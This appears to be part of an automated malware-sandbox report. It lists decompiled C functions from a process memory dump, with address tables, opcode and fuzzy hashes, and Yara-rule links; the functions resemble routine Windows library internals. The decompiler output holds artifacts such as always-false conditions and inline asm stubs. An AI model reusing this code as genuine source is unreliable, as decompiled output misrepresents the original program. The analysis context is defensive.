                                                0x01614dba
                                                0x01614dbb
                                                0x01614dc1
                                                0x01614dc8
                                                0x01614dcc
                                                0x01614dd5
                                                0x01614dde
                                                0x01614ddf
                                                0x01614de0
                                                0x01614de1
                                                0x01614de6
                                                0x01614de7
                                                0x01614de9
                                                0x01614df3
                                                0x00000000
                                                0x00000000
                                                0x01656c7c
                                                0x01656c8a
                                                0x01656c8a
                                                0x01656c9d
                                                0x01656ca7
                                                0x01656cac
                                                0x01656cb2
                                                0x01656cb9
                                                0x00000000
                                                0x01656cbf
                                                0x01656cbf
                                                0x00000000
                                                0x01656cbf
                                                0x01656cb9
                                                0x01614dfb
                                                0x01656ccf
                                                0x01656cd3
                                                0x01614e32
                                                0x01614e39
                                                0x01656ce0
                                                0x01656cf2
                                                0x01656cf2
                                                0x01656ce0
                                                0x01614e3f
                                                0x01614e41
                                                0x01614e51
                                                0x01614e51
                                                0x01614e03
                                                0x01614e03
                                                0x01614e09
                                                0x01614e0f
                                                0x01614e57
                                                0x00000000
                                                0x00000000
                                                0x01614e1b
                                                0x01614e30
                                                0x01614e5b
                                                0x01614e5b
                                                0x00000000
                                                0x01614e30
                                                0x01614e11
                                                0x01614e11
                                                0x01614e16
                                                0x00000000
                                                0x01614e16
                                                0x01614e01
                                                0x00000000
                                                0x01614e01
                                                0x01614da5
                                                0x01656c6b
                                                0x00000000
                                                0x01614dab
                                                0x01614dab
                                                0x00000000
                                                0x01614dab

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f0511bfbf82e335eea13a32316eff7dbb3a967cd3191fcaa750bd97cdae82cb
                                                • Instruction ID: cffe7f798bf21fc1e2c1f06f7c9eece1b807361eaec1bd7caec45815404a04d7
                                                • Opcode Fuzzy Hash: 5f0511bfbf82e335eea13a32316eff7dbb3a967cd3191fcaa750bd97cdae82cb
                                                • Instruction Fuzzy Hash: E941D371A443189FEB32DF18CC80F6AB7BAEB55710F0840A9E9459B385DB70ED44CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01614BAD, Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E01614BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x16dd360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E015ECC50(_t86);
					L11:
					return E0162B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x16d8504
				E01602280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0162FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0162B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01604620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E015ECCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x16d8504
								E015FFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01614F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                0x01614bad
                                                0x01614bbf
                                                0x01614bc2
                                                0x01614bc6
                                                0x01614bcd
                                                0x01614bd9
                                                0x016567fe
                                                0x01656800
                                                0x01614ccc
                                                0x01614ccd
                                                0x01614cb7
                                                0x01614cc9
                                                0x01614cc9
                                                0x01614bdf
                                                0x01614be5
                                                0x00000000
                                                0x00000000
                                                0x01614beb
                                                0x01614bef
                                                0x00000000
                                                0x00000000
                                                0x01614bf5
                                                0x01614bf9
                                                0x01614c06
                                                0x01614c0b
                                                0x01614c17
                                                0x01614c1c
                                                0x01614c1f
                                                0x01614c25
                                                0x01614c33
                                                0x01614c3d
                                                0x01614c40
                                                0x01614c43
                                                0x01614c47
                                                0x01614c4d
                                                0x01614c53
                                                0x01614c54
                                                0x01614c55
                                                0x01614c56
                                                0x01614c5b
                                                0x01614c5c
                                                0x01614c63
                                                0x01614c6b
                                                0x00000000
                                                0x00000000
                                                0x01656776
                                                0x01656784
                                                0x01656784
                                                0x0165679f
                                                0x016567a7
                                                0x016567af
                                                0x016567ce
                                                0x00000000
                                                0x016567b1
                                                0x016567b7
                                                0x016567b8
                                                0x016567c1
                                                0x016567d3
                                                0x016567d9
                                                0x016567dd
                                                0x01614c94
                                                0x01614c94
                                                0x01614c98
                                                0x01614c9c
                                                0x01614ca3
                                                0x016567f4
                                                0x016567f4
                                                0x01614cb5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x01614cb5
                                                0x01614c79
                                                0x01614c7e
                                                0x01614c89
                                                0x01614c8b
                                                0x01614c8f
                                                0x01614c8f
                                                0x00000000
                                                0x01614c89
                                                0x016567c3
                                                0x00000000
                                                0x016567c3
                                                0x016567af
                                                0x01614c73
                                                0x00000000
                                                0x00000000
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3388e183600b83c7a19c5528532024addb833b2ee9ad2b7c650308e2049e5d5e
                                                • Instruction ID: fe71a109ea0a5a30b1c4fb1c28687d934cebd98c8e76fb8141d4174a9d452f80
                                                • Opcode Fuzzy Hash: 3388e183600b83c7a19c5528532024addb833b2ee9ad2b7c650308e2049e5d5e
                                                • Instruction Fuzzy Hash: A841BE32A402299BDB21DF68CD40BEAB7B4EF45740F4500A9E908AB341EB74DE85CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015F8A0A, Relevance: .1, Instructions: 120COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 94%
                                                			E015F8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x16dd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0162B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E015FE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x15c1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01611DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01623C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E015F8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                0x015f8a0a
                                                0x015f8a1c
                                                0x015f8a23
                                                0x015f8a2e
                                                0x015f8a30
                                                0x015f8a36
                                                0x015f8a3c
                                                0x015f8a3e
                                                0x015f8a4a
                                                0x015f8a52
                                                0x015f8a9c
                                                0x015f8aae
                                                0x015f8a58
                                                0x015f8a5e
                                                0x015f8a6a
                                                0x015f8a6f
                                                0x015f8a75
                                                0x015f8a7d
                                                0x015f8a85
                                                0x015f8a86
                                                0x015f8a89
                                                0x015f8a93
                                                0x015f8a99
                                                0x015f8a9b
                                                0x00000000
                                                0x015f8aaf
                                                0x015f8abe
                                                0x015f8ac3
                                                0x015f8acb
                                                0x015f8ad7
                                                0x015f8ae0
                                                0x015f8af1
                                                0x00000000
                                                0x015f8af1
                                                0x015f8acd
                                                0x015f8ad5
                                                0x015f8afb
                                                0x015f8afd
                                                0x015f8aff
                                                0x015f8b07
                                                0x015f8b22
                                                0x015f8b24
                                                0x015f8b2a
                                                0x015f8b2e
                                                0x015f8b3f
                                                0x015f8b78
                                                0x015f8b41
                                                0x015f8b52
                                                0x015f8b54
                                                0x015f8b5c
                                                0x015f8b74
                                                0x015f8b74
                                                0x015f8b5c
                                                0x015f8b3f
                                                0x015f8b5e
                                                0x015f8b61
                                                0x015f8b64
                                                0x015f8b64
                                                0x015f8b6c
                                                0x015f8b6c
                                                0x015f8b11
                                                0x01649cd5
                                                0x01649cd5
                                                0x015f8b17
                                                0x015f8b1a
                                                0x015f8b1a
                                                0x00000000
                                                0x015f8ad5
                                                0x015f8a89

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e27497d9fdcaa53bb982d794f96e59b6b0483eb0cdf17358440eb1763df6a73
                                                • Instruction ID: 4de5119b538a624ee7c0eb0f6548cb8d4c55676a2686a7e0725ab42cda03428f
                                                • Opcode Fuzzy Hash: 6e27497d9fdcaa53bb982d794f96e59b6b0483eb0cdf17358440eb1763df6a73
                                                • Instruction Fuzzy Hash: 014192B1A4022D9BDB24DF59CC88AAEB7F5FB94310F1045EDDA199B242E7709E84CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016669A6, Relevance: .1, Instructions: 108COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 69%
                                                			E016669A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x16dd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L015F6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01666BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01629980() >= 0) {
							E01602280(_t56, 0x16d8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x16d8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x16d8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E015EB6F0(0x15cc338, 0x15cc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01629520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E016295D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E015FFFB0(_t68, _t77, 0x16d8778);
				}
				_pop(_t78);
				return E0162B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                0x016669b5
                                                0x016669be
                                                0x016669c3
                                                0x016669c9
                                                0x016669cc
                                                0x016669d1
                                                0x016669d3
                                                0x016669de
                                                0x016669e1
                                                0x016669ea
                                                0x016669f6
                                                0x016669fe
                                                0x01666a13
                                                0x01666a14
                                                0x01666a15
                                                0x01666a16
                                                0x01666a1e
                                                0x01666a26
                                                0x01666a31
                                                0x01666a36
                                                0x01666a37
                                                0x01666a40
                                                0x01666a49
                                                0x01666a4a
                                                0x01666a53
                                                0x01666a59
                                                0x01666a5d
                                                0x01666a5e
                                                0x01666a64
                                                0x01666a67
                                                0x01666a6a
                                                0x01666a6d
                                                0x01666a70
                                                0x01666a77
                                                0x01666a7d
                                                0x01666a86
                                                0x01666a89
                                                0x01666a9c
                                                0x01666a9f
                                                0x01666aa2
                                                0x01666aa5
                                                0x01666aaf
                                                0x01666ab1
                                                0x01666ab8
                                                0x01666ab9
                                                0x01666abb
                                                0x01666abe
                                                0x01666ac5
                                                0x01666ac5
                                                0x01666aaf
                                                0x01666a40
                                                0x01666a26
                                                0x016669fe
                                                0x01666ace
                                                0x01666ad0
                                                0x01666ad3
                                                0x01666ad8
                                                0x01666adf
                                                0x01666adf
                                                0x01666ae8
                                                0x01666aef
                                                0x01666aef
                                                0x01666af9
                                                0x01666b06

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc100e527e02746749609885345be0d00caaf1702bf293a7f87b5a3103e3a4b6
                                                • Instruction ID: da2c68f9e6ba5f1fc24e604048baf7af1d42703a9d9f9459aee3ca79bd1c9cbc
                                                • Opcode Fuzzy Hash: bc100e527e02746749609885345be0d00caaf1702bf293a7f87b5a3103e3a4b6
                                                • Instruction Fuzzy Hash: E14146B1E01219AFDB24DFAADD40BBEBBF9EF48714F14812EE915A7240DB709905CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015E5210, Relevance: .1, Instructions: 107COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 85%
                                                			E015E5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E015E52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016295D0();
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E015FEB70(_t54, 0x16d79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E016295D0();
								L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E015FEB70(_t54, 0x16d79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0162F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E015FEB70(_t54, 0x16d79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E016295D0();
							L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                0x015e5220
                                                0x015e5224
                                                0x01640d13
                                                0x01640d16
                                                0x01640d19
                                                0x015e522a
                                                0x015e522a
                                                0x015e522d
                                                0x015e522d
                                                0x015e5231
                                                0x015e5235
                                                0x015e5239
                                                0x01640d5c
                                                0x01640d62
                                                0x00000000
                                                0x00000000
                                                0x01640d6a
                                                0x01640d7b
                                                0x01640d7f
                                                0x01640d81
                                                0x01640d84
                                                0x01640d95
                                                0x01640d95
                                                0x01640d6c
                                                0x01640d71
                                                0x01640d71
                                                0x01640d9a
                                                0x00000000
                                                0x015e524a
                                                0x015e524a
                                                0x015e5250
                                                0x01640d24
                                                0x01640d35
                                                0x01640d39
                                                0x01640d3b
                                                0x01640d3e
                                                0x01640d50
                                                0x01640d50
                                                0x01640d26
                                                0x01640d2b
                                                0x01640d2b
                                                0x00000000
                                                0x01640d55
                                                0x015e5256
                                                0x015e525b
                                                0x015e5265
                                                0x01640da7
                                                0x015e526b
                                                0x015e526e
                                                0x015e5272
                                                0x01640db1
                                                0x01640db4
                                                0x01640dc5
                                                0x01640dc5
                                                0x015e5272
                                                0x015e5278
                                                0x015e527e
                                                0x015e528a
                                                0x015e528c
                                                0x015e528d
                                                0x00000000
                                                0x015e5280
                                                0x015e5282
                                                0x015e5288
                                                0x015e529f
                                                0x015e5292
                                                0x00000000
                                                0x015e5292
                                                0x00000000
                                                0x015e5288
                                                0x015e527e

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c02b8103001438d88daef467e9f24ac016abb11f0159e6ff051c5d72ca2de818
                                                • Instruction ID: 5d6cdf491f37845ae053c4d93cbb81c7cbe4ff2d4e5c6728aca8bc4faec74c35
                                                • Opcode Fuzzy Hash: c02b8103001438d88daef467e9f24ac016abb11f0159e6ff051c5d72ca2de818
                                                • Instruction Fuzzy Hash: B6312A32A51622DBC7269F28CC45FAA77E6FF50764F114A1DF6954F2A1E730F804C690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 01623D43, Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E01623D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E015F7B60(0, _t61, 0x15c11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E015F7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01604620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                0x01623d4c
                                                0x01623d50
                                                0x01623d55
                                                0x01623d5e
                                                0x0165e79a
                                                0x00000000
                                                0x0165e79a
                                                0x01623d68
                                                0x0165e789
                                                0x01623d9d
                                                0x01623da3
                                                0x01623daf
                                                0x01623db5
                                                0x01623dbc
                                                0x01623dc4
                                                0x01623dc9
                                                0x01623dce
                                                0x0165e7ae
                                                0x0165e7ae
                                                0x01623dde
                                                0x01623de2
                                                0x01623de7
                                                0x01623e0d
                                                0x01623e13
                                                0x01623e16
                                                0x01623e1e
                                                0x01623e25
                                                0x01623e28
                                                0x00000000
                                                0x00000000
                                                0x01623e2a
                                                0x01623e2f
                                                0x01623e37
                                                0x01623e37
                                                0x00000000
                                                0x01623e37
                                                0x01623e31
                                                0x00000000
                                                0x01623e31
                                                0x01623e20
                                                0x01623e20
                                                0x01623e35
                                                0x00000000
                                                0x01623de9
                                                0x01623de9
                                                0x01623de9
                                                0x01623dee
                                                0x01623dfd
                                                0x01623dff
                                                0x01623e02
                                                0x01623e05
                                                0x01623e05
                                                0x00000000
                                                0x01623df0
                                                0x01623de7
                                                0x0165e78f
                                                0x0165e794
                                                0x01623d79
                                                0x01623d84
                                                0x01623d89
                                                0x01623d8e
                                                0x00000000
                                                0x0165e7a4
                                                0x01623d96
                                                0x01623d9a
                                                0x00000000
                                                0x01623d9a
                                                0x00000000
                                                0x0165e794
                                                0x01623d6e
                                                0x01623d73
                                                0x00000000
                                                0x0165e7b5
                                                0x00000000

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2ac7b8774cf4da9797a8a8d3518c517e33691d3c52f4e8f26ce3cdb2887d28a4
                                                • Instruction ID: 84187ca2b74cce4e1e0056eeb5c957914cdb79ecac73025aa1496c3ff878821c
                                                • Opcode Fuzzy Hash: 2ac7b8774cf4da9797a8a8d3518c517e33691d3c52f4e8f26ce3cdb2887d28a4
                                                • Instruction Fuzzy Hash: CE318F32A05A25DBDB258F2DCC41A7ABBB5FF99710B05846EE985CB350E738D841CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0161A61C, Relevance: .1, Instructions: 106COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 78%
                                                			E0161A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x16c0220);
				E0163D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x16d7b9c; // 0x0
				_t55 = L01604620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0163D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x16d7b10 =  *0x16d7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x16d536c; // 0x776f5368
					if( *_t51 != 0x16d5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x16d5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x16d536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0161A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
